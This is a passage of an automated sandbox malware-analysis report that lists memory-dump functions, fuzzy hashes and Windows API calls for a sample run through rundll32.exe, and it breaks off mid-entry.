Uniqueness

Uniqueness Score: -1.00%

Function 00B72BC8, Relevance: 1.0, Instructions: 959COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.846806132.0000000000B71000.00000020.00000001.sdmp, Offset: 00B71000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_b71000_control.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ce53e8885eef6f405a18b534ce9aa84660a43129bf14b24cd1073f7758dbc652
Instruction ID: 05e57cd502394cf0e256ecafd39e09efef51aa7487acec867e5fc811feede484
Opcode Fuzzy Hash: ce53e8885eef6f405a18b534ce9aa84660a43129bf14b24cd1073f7758dbc652
Instruction Fuzzy Hash: 7C720D30618B448FDB79EF28C495A6EB7E2FBD8701F14896EE19EC3254DB309941DB42

Uniqueness

Uniqueness Score: -1.00%

Function 00B98224, Relevance: .8, Instructions: 818COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.846806132.0000000000B71000.00000020.00000001.sdmp, Offset: 00B71000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_b71000_control.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a443d61341c18cd97b790f006cf3d1912a007581d04bdff0d780d85c9a98818a
Instruction ID: 1559b60f5e2768a89eeec2e37c2971beb4367f3ce72d81f2d1142f57061612ed
Opcode Fuzzy Hash: a443d61341c18cd97b790f006cf3d1912a007581d04bdff0d780d85c9a98818a
Instruction Fuzzy Hash: 3B52E030524A448FCB6DCF1CC4C56B437E5FB4A314B6452BDDC8ACB25BEA399886CB85

Uniqueness

Uniqueness Score: -1.00%

Function 00B77320, Relevance: .6, Instructions: 601COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.846806132.0000000000B71000.00000020.00000001.sdmp, Offset: 00B71000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_b71000_control.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cd3136d2289194873e33efb2f48f157972e675c37aa1850b7e11595ba4bc6e77
Instruction ID: 636aa841029a821c6e2ec9a2b1eabd11708161295e6e46a963c9b3ee473d2c3a
Opcode Fuzzy Hash: cd3136d2289194873e33efb2f48f157972e675c37aa1850b7e11595ba4bc6e77
Instruction Fuzzy Hash: 4B12E570658B599FC31DDF28C4856E4B7E0FB55308F1085ADD8EB83602DB26E466CBC2

Uniqueness

Uniqueness Score: -1.00%

Function 00B9E080, Relevance: .6, Instructions: 572COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.846806132.0000000000B71000.00000020.00000001.sdmp, Offset: 00B71000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_b71000_control.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2798525bac0ede09e869c64245c6507276901d2ac0d7b0b2c734b716b625cc8e
Instruction ID: f1d844ad3223687af90833043739d0d409122c7a261ea795b714ea6a32ac9b41
Opcode Fuzzy Hash: 2798525bac0ede09e869c64245c6507276901d2ac0d7b0b2c734b716b625cc8e
Instruction Fuzzy Hash: C3125530614F9AAFCB0EDF28C4855A8B7E1FB59319B1042A9C466C3A51E735F866CFC4

Uniqueness

Uniqueness Score: -1.00%

Function 00B7D460, Relevance: .6, Instructions: 554COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.846806132.0000000000B71000.00000020.00000001.sdmp, Offset: 00B71000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_b71000_control.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 330a9aa12c6ff8a79775d49d2767f2384196221c541152650cbf6622a85dfc99
Instruction ID: c4e8d813fa907563660787f46b1f7e5974f2e662ae622db3c2afbc407e5c9e99
Opcode Fuzzy Hash: 330a9aa12c6ff8a79775d49d2767f2384196221c541152650cbf6622a85dfc99
Instruction Fuzzy Hash: FFF13770214A0A8BD72DAF2CD8852B573F1FF94359F1482BED59FC2195EA34D847C682

Uniqueness

Uniqueness Score: -1.00%

Function 00B9F940, Relevance: .5, Instructions: 515COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.846806132.0000000000B71000.00000020.00000001.sdmp, Offset: 00B71000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_b71000_control.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3672760b6b3f398ae9d795d7dcafc8815f8a6bf6e33c05536d5303da6c717689
Instruction ID: 8632da25146b54da8d2f6eaaa7f89541456a21fc3ef20b2c68df07a42958cadf
Opcode Fuzzy Hash: 3672760b6b3f398ae9d795d7dcafc8815f8a6bf6e33c05536d5303da6c717689
Instruction Fuzzy Hash: A0E12931618A854FDB0D9E3CD9962B47BE1FB95324B2882BDE8DBC3387D52998078741

Uniqueness

Uniqueness Score: -1.00%

Function 00B8D4A8, Relevance: .5, Instructions: 490COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.846806132.0000000000B71000.00000020.00000001.sdmp, Offset: 00B71000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_b71000_control.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d6df0730ef4bf58d31d675e2aba10241cc7989b9c41ca9196fc39608153e366e
Instruction ID: d8577c6139fee5a30c6acd5485aeb8e23766bfe276fd7a48e6eed195dee81481
Opcode Fuzzy Hash: d6df0730ef4bf58d31d675e2aba10241cc7989b9c41ca9196fc39608153e366e
Instruction Fuzzy Hash: 15D12B34258A4D4FEB1DAF18D8C22B577D2F756300F5442AED5C7C32A2DA25E853CB86

Uniqueness

Uniqueness Score: -1.00%

Function 00B974CC, Relevance: .4, Instructions: 449COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.846806132.0000000000B71000.00000020.00000001.sdmp, Offset: 00B71000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_b71000_control.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cf875b605b40a34af0326c56a6fca20d7c3f307a1796be211662965362916f8b
Instruction ID: a3ac2192ae57bc3f5ce0e959acfb2699bf781a826dca9872d49c6738632ac553
Opcode Fuzzy Hash: cf875b605b40a34af0326c56a6fca20d7c3f307a1796be211662965362916f8b
Instruction Fuzzy Hash: 22D1E63061CB188FDB18EF29D8C9669B7E1F798700F54457DE58AC3262DE34E946CB82

Uniqueness

Uniqueness Score: -1.00%

Function 00B90034, Relevance: .4, Instructions: 445COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.846806132.0000000000B71000.00000020.00000001.sdmp, Offset: 00B71000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_b71000_control.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0410a4167a375566f8ba12f17147ce5c8607138fe5ce19b47042865aa484ad92
Instruction ID: 0ca102c081c1c10ebedaf0d634de682a6ee3836cbf02cdb44f2f6470991695a8
Opcode Fuzzy Hash: 0410a4167a375566f8ba12f17147ce5c8607138fe5ce19b47042865aa484ad92
Instruction Fuzzy Hash: C9D1843522CA488FDB58FF28E885A6AB3E1FB99300F15456DE45BC3261DF34E845CB42

Uniqueness

Uniqueness Score: -1.00%

Function 00B920F8, Relevance: .4, Instructions: 444COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.846806132.0000000000B71000.00000020.00000001.sdmp, Offset: 00B71000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_b71000_control.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 38ef7869ea58fb94598961df75031656996b7b80e58d3b09030ad0ec587d72ab
Instruction ID: 602dbca924ef48541a0279ced8948289bde14eceb65a6a058bd268bd9dc55087
Opcode Fuzzy Hash: 38ef7869ea58fb94598961df75031656996b7b80e58d3b09030ad0ec587d72ab
Instruction Fuzzy Hash: CAE17E30B14B059FEB58EB39DCA5AA673E6FBDD301B448079984AC3360DE38D945CB51

Uniqueness

Uniqueness Score: -1.00%

Function 00B7203C, Relevance: .4, Instructions: 440COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.846806132.0000000000B71000.00000020.00000001.sdmp, Offset: 00B71000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_b71000_control.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6856baa2744d5c5f37773981dc3747ff70e285344847ae6b40f5a8a125173493
Instruction ID: c7e022d9e2fa9a2cb5043ca1aa65acd2528809561a9005d78b3daf626fbd4573
Opcode Fuzzy Hash: 6856baa2744d5c5f37773981dc3747ff70e285344847ae6b40f5a8a125173493
Instruction Fuzzy Hash: 28D1A43161CA088FEB5AEF28EC9996A73E5F798300700466ED45FD3265DF38DA45CB81

Uniqueness

Uniqueness Score: -1.00%

Function 00B8B040, Relevance: .4, Instructions: 420COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.846806132.0000000000B71000.00000020.00000001.sdmp, Offset: 00B71000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_b71000_control.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 948161d6fa15a810aa6e5b6e230907f9d72ef5ce46a0806776a272e79ee9e756
Instruction ID: 4122355ac252aa20c8ae3777f0147a078da6f36d6dc42c17cf694f4cc04fac36
Opcode Fuzzy Hash: 948161d6fa15a810aa6e5b6e230907f9d72ef5ce46a0806776a272e79ee9e756
Instruction Fuzzy Hash: 72E1633060CB488FDB69EF24DC99AAAB7E1FB99311F14456DE48EC3121DB34D945CB82

Uniqueness

Uniqueness Score: -1.00%

Function 00B994B8, Relevance: .4, Instructions: 378COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.846806132.0000000000B71000.00000020.00000001.sdmp, Offset: 00B71000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_b71000_control.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0cc8c4c9f205f58748cb3b44b050f6e6f9e6345d57d988be40e27c4f8ce905cb
Instruction ID: 5fc2935f3df75b08e78368442c451036485a64c4dcd9b51a13556f8699b38064
Opcode Fuzzy Hash: 0cc8c4c9f205f58748cb3b44b050f6e6f9e6345d57d988be40e27c4f8ce905cb
Instruction Fuzzy Hash: BAC19030218A058FEF98DF28C8897AAB7E5FB99345F50457DD48BC3691DB38D851CB82

Uniqueness

Uniqueness Score: -1.00%

Function 00B737B8, Relevance: .4, Instructions: 365COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.846806132.0000000000B71000.00000020.00000001.sdmp, Offset: 00B71000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_b71000_control.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 38711eba31781e4de2b32a3d4a8a3a54250a23ca74fa31da85b9ea8fcf3ad2ab
Instruction ID: b4d8a53392de08c3204434bde6e6a4f11a32bf0f64b4665fa14092d6edd3a5ae
Opcode Fuzzy Hash: 38711eba31781e4de2b32a3d4a8a3a54250a23ca74fa31da85b9ea8fcf3ad2ab
Instruction Fuzzy Hash: 52C14B70618B098FDBA4EF28D888B6A77F6FB98701F508579E44EC3261DB34D945CB42

Uniqueness

Uniqueness Score: -1.00%

Function 00B7C134, Relevance: .4, Instructions: 352COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.846806132.0000000000B71000.00000020.00000001.sdmp, Offset: 00B71000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_b71000_control.jbxd

Similarity

API ID: CloseQueryValue
String ID:
API String ID: 3356406503-0
Opcode ID: fe302deaf498671735d961f0a066218eb8c14df84780a904b4dffb1cfaa5c9dd
Instruction ID: e4055d373d29554417043b33f2023ef21a5f638d6e701891f6f076e5671c080c
Opcode Fuzzy Hash: fe302deaf498671735d961f0a066218eb8c14df84780a904b4dffb1cfaa5c9dd
Instruction Fuzzy Hash: C4A18031718A088FD779EF28D88567AB7E2F789300F65867DD49FC3255DE34A8428782

Uniqueness

Uniqueness Score: -1.00%

Function 00B7B75C, Relevance: .3, Instructions: 336COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.846806132.0000000000B71000.00000020.00000001.sdmp, Offset: 00B71000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_b71000_control.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 280b5ea547be97f12bd2d338b9f92d1c614892cb3105043b1a309246ffb6b572
Instruction ID: 8905f46653b584bec1954bcf54d93b7b7cb544dc8e681df0d716b298221c4332
Opcode Fuzzy Hash: 280b5ea547be97f12bd2d338b9f92d1c614892cb3105043b1a309246ffb6b572
Instruction Fuzzy Hash: 19B17F30618B098FDB68DF18D885B66B7E5FB98311F54856DE99EC3250DB34E842CF82

Uniqueness

Uniqueness Score: -1.00%

Function 00B991A0, Relevance: .3, Instructions: 284COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.846806132.0000000000B71000.00000020.00000001.sdmp, Offset: 00B71000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_b71000_control.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 40becd915303a3bf600ab9d0924b14316bcba838081402962a61d943fc700c8c
Instruction ID: 14ff5bf75990e93585e41cfaa6feaf99444a8eb3a555de51664dc544733c6e71
Opcode Fuzzy Hash: 40becd915303a3bf600ab9d0924b14316bcba838081402962a61d943fc700c8c
Instruction Fuzzy Hash: A381E73121CB488FEB65EF2CD8896A977E1F799310F00457EE44AC3292EE34DD458786

Uniqueness

Uniqueness Score: -1.00%

Function 00B9B516, Relevance: .3, Instructions: 282COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.846806132.0000000000B71000.00000020.00000001.sdmp, Offset: 00B71000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_b71000_control.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 7e0d6ca746b9e6f46bedcdbd6d505a8630fe9095657e2771a051d93914121220
Instruction ID: 09192fdcd97f54b18396052ba6353c454c2021de22b014cdd133b57fefc662d0
Opcode Fuzzy Hash: 7e0d6ca746b9e6f46bedcdbd6d505a8630fe9095657e2771a051d93914121220
Instruction Fuzzy Hash: 4D9171307186498FEB64EF24D89976AB3E2FB88305F44857DE48AC21A1DF78D941CB42

Uniqueness

Uniqueness Score: -1.00%

Function 00B9BEB0, Relevance: .3, Instructions: 276COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.846806132.0000000000B71000.00000020.00000001.sdmp, Offset: 00B71000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_b71000_control.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 92c0d9c28f7b14cf48f0e7bc275c44090f6c1faebb4c9eff1c20231799670893
Instruction ID: 0e5b28c9ce130bf134f15788cf716c30888a56643945852cd576fd3214cc8504
Opcode Fuzzy Hash: 92c0d9c28f7b14cf48f0e7bc275c44090f6c1faebb4c9eff1c20231799670893
Instruction Fuzzy Hash: 40816E3160CB598FDB28EF58EC8566AB7E1EBD4701F04466ED44EC3265DF74E8018B86

Uniqueness

Uniqueness Score: -1.00%

Function 00B89CB0, Relevance: .3, Instructions: 266COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.846806132.0000000000B71000.00000020.00000001.sdmp, Offset: 00B71000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_b71000_control.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9872f95907a3fff3bb2dc15ad370fe03462685fd16831ec47ef12214c055560d
Instruction ID: fbf6d3f42d3b36b2c2e56d5020059a0e953b3d85cf46a7069b0a694ae34d6dad
Opcode Fuzzy Hash: 9872f95907a3fff3bb2dc15ad370fe03462685fd16831ec47ef12214c055560d
Instruction Fuzzy Hash: F681753061CB098FDF58FF29D899A6677E1FBA8301B14496DE44AC3265DF34E841CB81

Uniqueness

Uniqueness Score: -1.00%

Function 00B8452C, Relevance: .3, Instructions: 266COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.846806132.0000000000B71000.00000020.00000001.sdmp, Offset: 00B71000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_b71000_control.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 66179212810935a8c24ca55900a10875e2e60a99fd685c80c6d3f40906bda9a8
Instruction ID: 3eadde6e028f6ef25b37330ba68c94890c186618b3125450619cd0cdbd5df93e
Opcode Fuzzy Hash: 66179212810935a8c24ca55900a10875e2e60a99fd685c80c6d3f40906bda9a8
Instruction Fuzzy Hash: 3E71A231218F0A8FDB64FF6C988966AB3D5FBA9310B4542ADD80AC3265EF34D805C781

Uniqueness

Uniqueness Score: -1.00%

Function 00B79F98, Relevance: .3, Instructions: 263COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.846806132.0000000000B71000.00000020.00000001.sdmp, Offset: 00B71000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_b71000_control.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 20d07e163d5561e6cb2de8386772746ac9d79f432579530db84dc555c3bfe41a
Instruction ID: 83cce6f3a7d860cc57aed0b4e22f014f820b003f7255da45e9a927aabdaedf3b
Opcode Fuzzy Hash: 20d07e163d5561e6cb2de8386772746ac9d79f432579530db84dc555c3bfe41a
Instruction Fuzzy Hash: 23716131618A088FEB98EF1CD49576933D1FB99740F44C5E9ED1ECB256EA24DC42CB82

Uniqueness

Uniqueness Score: -1.00%

Function 00B7AE04, Relevance: .3, Instructions: 251COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.846806132.0000000000B71000.00000020.00000001.sdmp, Offset: 00B71000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_b71000_control.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 63e28886487f74e342c32be38909b8fe1cb0233e2626cf88d521a93613bc1520
Instruction ID: 859dc22cadc7aa77075c482882481103a28c64bbc3e863654d58c9e9657bf613
Opcode Fuzzy Hash: 63e28886487f74e342c32be38909b8fe1cb0233e2626cf88d521a93613bc1520
Instruction Fuzzy Hash: D071A23161DB088FE754EF6DDC89A6AB7E5FB98711F10856EE44AC3210DB74E841CB82

Uniqueness

Uniqueness Score: -1.00%

Function 00B817B8, Relevance: .3, Instructions: 251COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.846806132.0000000000B71000.00000020.00000001.sdmp, Offset: 00B71000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_b71000_control.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 83b4e4303a3a045f9e01f9880aa6fe171011acb70a9d52f974b2da6cf2d59583
Instruction ID: 0931fcb375fe9958bd5baa46e14c9cfe7dfe591e9c76082497ba52e4d84f25fe
Opcode Fuzzy Hash: 83b4e4303a3a045f9e01f9880aa6fe171011acb70a9d52f974b2da6cf2d59583
Instruction Fuzzy Hash: A961E33161DA484FDB68BB2C985667A73D9FB94310F1549ADE88BD3251EE20EC43C7C2

Uniqueness

Uniqueness Score: -1.00%

Function 00B96064, Relevance: .2, Instructions: 226COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.846806132.0000000000B71000.00000020.00000001.sdmp, Offset: 00B71000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_b71000_control.jbxd

Similarity

API ID: CloseQueryValue
String ID:
API String ID: 3356406503-0
Opcode ID: 3a44364c1016a49f04a174e3afe068aeab8b5f2945e2751d4b9c629dff2ad2c2
Instruction ID: 2147dcd702a7a08f049a9cc1feb68122d845dee34f5ee3c3bf467e533ff4201e
Opcode Fuzzy Hash: 3a44364c1016a49f04a174e3afe068aeab8b5f2945e2751d4b9c629dff2ad2c2
Instruction Fuzzy Hash: 26717C30618A098FEB64EF78D885BAAB3E5FB98301F40856ED44EC7255DF34D941CB82

Uniqueness

Uniqueness Score: -1.00%

Function 00B81174, Relevance: .2, Instructions: 226COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.846806132.0000000000B71000.00000020.00000001.sdmp, Offset: 00B71000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_b71000_control.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7ce160d619847d54f4be3adc656e223daaab6dc6a76314402b8f61af63e542f7
Instruction ID: 1a28cb35ab7935cec805ecc0c78719429a99d86925ee60b55ecc243ed928f35f
Opcode Fuzzy Hash: 7ce160d619847d54f4be3adc656e223daaab6dc6a76314402b8f61af63e542f7
Instruction Fuzzy Hash: 5E61A830708A488FDF64EF6C9C9856977E6FBA9301B15496EE44AC3260DF38D843CB46

Uniqueness

Uniqueness Score: -1.00%

Function 00B81D94, Relevance: .2, Instructions: 220COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.846806132.0000000000B71000.00000020.00000001.sdmp, Offset: 00B71000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_b71000_control.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 56514dbe61aac1fa13fd9da6dcc3f65dbb396996e43bc20d70b628ec65a670a2
Instruction ID: c28a4b563c2638bba3e8450872f43dafaf4775a6870adc3d843327bf698f3dde
Opcode Fuzzy Hash: 56514dbe61aac1fa13fd9da6dcc3f65dbb396996e43bc20d70b628ec65a670a2
Instruction Fuzzy Hash: 2E519031718E094FAB68FB2DAC9A67973D6E7E8311314816EE40AC3265DE38D807C781

Uniqueness

Uniqueness Score: -1.00%

Function 00B89138, Relevance: .2, Instructions: 213COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.846806132.0000000000B71000.00000020.00000001.sdmp, Offset: 00B71000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_b71000_control.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 87212040f7791581802ebfb24c456a6cd4a98c2c83bdb6ee99117a63e13e8226
Instruction ID: a162acff21ff918faa294153a0d3c1d3f32935a9feb29cc5aecd7e91eeb0b07c
Opcode Fuzzy Hash: 87212040f7791581802ebfb24c456a6cd4a98c2c83bdb6ee99117a63e13e8226
Instruction Fuzzy Hash: 20619031718A499FDB68FF68D889679B3E2FB98701F54453DD08AC3650DB34D806CB82

Uniqueness

Uniqueness Score: -1.00%

Function 00B926B4, Relevance: .1, Instructions: 119COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.846806132.0000000000B71000.00000020.00000001.sdmp, Offset: 00B71000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_b71000_control.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 36f556d1b6bda4cf9978c5a6a125f21c466a14fffa3b6bd7b7cefd5bf313fa60
Instruction ID: 7b459ebb8f495742dead81521d2254462afb533627ab5df92df6d6b46aba1da1
Opcode Fuzzy Hash: 36f556d1b6bda4cf9978c5a6a125f21c466a14fffa3b6bd7b7cefd5bf313fa60
Instruction Fuzzy Hash: 4A316F347147058BEB08EF78D899A6677E2FBD8301B04C93DE945C3224DE79DC818B81

Uniqueness

Uniqueness Score: -1.00%

Function 00B7BCF8, Relevance: .1, Instructions: 107COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.846806132.0000000000B71000.00000020.00000001.sdmp, Offset: 00B71000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_b71000_control.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a9c2d71df9ba96d9697ca19b724d09e34a4cb7770348c426de2a33892a8029ec
Instruction ID: d00b2189d9ee76100b26e8d8d75f8deef81a3edcde8527ca28526a6dc83adb00
Opcode Fuzzy Hash: a9c2d71df9ba96d9697ca19b724d09e34a4cb7770348c426de2a33892a8029ec
Instruction Fuzzy Hash: 20414C1511DBC2AEC31ADA2D84401A9FFA1BFB6100B48879DD4C997F43C358E669C7E6

Uniqueness

Uniqueness Score: -1.00%

Function 00B93208, Relevance: .1, Instructions: 90COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.846806132.0000000000B71000.00000020.00000001.sdmp, Offset: 00B71000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_b71000_control.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dddd3ca5bb177d580940e9c3c5e54999e5dd2f8092cf2c07f884e3a752e35e77
Instruction ID: c675e73cfdb323ae53f3ca5e0d46f7fb0be3c849e7557da3d32237ab53221ae2
Opcode Fuzzy Hash: dddd3ca5bb177d580940e9c3c5e54999e5dd2f8092cf2c07f884e3a752e35e77
Instruction Fuzzy Hash: 2C318E1111DBC7AED30ADA6C8040169FFA1FB77200B48879DD4D597B43C318E6A9C7E2

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: rundll32.exe PID: 6828 Parent PID: 6328 rundll32.exeCOMMON

Execution Graph

Execution Coverage:	2.7%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0%
Total number of Nodes:	516
Total number of Limit Nodes:	32

Executed Functions

Function 0000027FF74EF7EC, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 113
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtQueryInformationToken.NTDLL ref: 0000027FF74EF8A0
NtQueryInformationToken.NTDLL ref: 0000027FF74EF8E8
NtClose.NTDLL ref: 0000027FF74EF920

Strings

0, xrefs: 0000027FF74EF84B

Memory Dump Source

Source File: 00000027.00000002.847104724.0000027FF74C1000.00000020.00000001.sdmp, Offset: 0000027FF74C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_39_2_27ff74c1000_rundll32.jbxd

Similarity

API ID: InformationQueryToken$Close
String ID: 0
API String ID: 459398573-4108050209
Opcode ID: 75f5f25a32e44abd967634ea221ebc7d1d7f2de2e2c95ac0f277a3d61ca82601
Instruction ID: 00640c67e728f861381397131da5a96f642ff8705ead1d7b67dbfc66dc0cba2c
Opcode Fuzzy Hash: 75f5f25a32e44abd967634ea221ebc7d1d7f2de2e2c95ac0f277a3d61ca82601
Instruction Fuzzy Hash: 4B41083021CB498FD7A4EF19D88879AB7E5FB98311F40492EE58EC7290DB349A05CB42

Uniqueness

Uniqueness Score: -1.00%

Function 0000027FF74EA4BC, Relevance: 4.8, APIs: 3, Instructions: 297
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

HeapCreate.KERNELBASE ref: 0000027FF74EA51D
VirtualAlloc.KERNELBASE ref: 0000027FF74EA617
VirtualFree.KERNELBASE ref: 0000027FF74EA6F4

Memory Dump Source

Source File: 00000027.00000002.847104724.0000027FF74C1000.00000020.00000001.sdmp, Offset: 0000027FF74C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_39_2_27ff74c1000_rundll32.jbxd

Similarity

API ID: Virtual$AllocCreateFreeHeap
String ID:
API String ID: 2341667014-0
Opcode ID: 0e2db259d8c6b1358d19cfe41b628647c1408c81e58ecea94120c053d597cdbc
Instruction ID: 5374c87b6fce29ffbc475174ef12e8995b05df32b3e79941f36285b34a7d00f9
Opcode Fuzzy Hash: 0e2db259d8c6b1358d19cfe41b628647c1408c81e58ecea94120c053d597cdbc
Instruction Fuzzy Hash: DB91607061CB098FE798EB2898897AA73E5FB94311F40413DE58BC3691EF38D8468752

Uniqueness

Uniqueness Score: -1.00%

Function 0000027FF74EC164, Relevance: 4.0, APIs: 2, Instructions: 1050synchronizationCOMMON

Download Yara Rule

APIs

CreateMutexExA.KERNEL32 ref: 0000027FF74EC22F
GetUserNameA.ADVAPI32 ref: 0000027FF74EC4C3

Memory Dump Source

Source File: 00000027.00000002.847104724.0000027FF74C1000.00000020.00000001.sdmp, Offset: 0000027FF74C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_39_2_27ff74c1000_rundll32.jbxd

Similarity

API ID: CreateMutexNameUser
String ID:
API String ID: 3764123871-0
Opcode ID: fffaa4b755b4794267c42af2f427b21d38ec734e3ecc3f810019e9c7598c9933
Instruction ID: 9eeb0516c3aa59229700ddd7891dda895bced64ba7840f87bdde0379e1249603
Opcode Fuzzy Hash: fffaa4b755b4794267c42af2f427b21d38ec734e3ecc3f810019e9c7598c9933
Instruction Fuzzy Hash: 7F72C47061CA4ACFE7A8EF28E98967977E1F754310F50453ED44BC3AE1DE3498428B92

Uniqueness

Uniqueness Score: -1.00%

Function 0000027FF7501002, Relevance: 3.4, APIs: 2, Instructions: 361
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtProtectVirtualMemory.NTDLL ref: 0000027FF7501298
NtProtectVirtualMemory.NTDLL ref: 0000027FF7501327

Memory Dump Source

Source File: 00000027.00000002.847405092.0000027FF7501000.00000040.00000001.sdmp, Offset: 0000027FF7501000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_39_2_27ff7501000_rundll32.jbxd

Similarity

API ID: MemoryProtectVirtual
String ID:
API String ID: 2706961497-0
Opcode ID: 37d0f459fa47460dc0f1faec055400dbd8bf25196c52ed08d60f78cc46762e5f
Instruction ID: 34c214ad148d008810025b7c92820178d8ec012d82ddf8fc88de2d02cc6b9e40
Opcode Fuzzy Hash: 37d0f459fa47460dc0f1faec055400dbd8bf25196c52ed08d60f78cc46762e5f
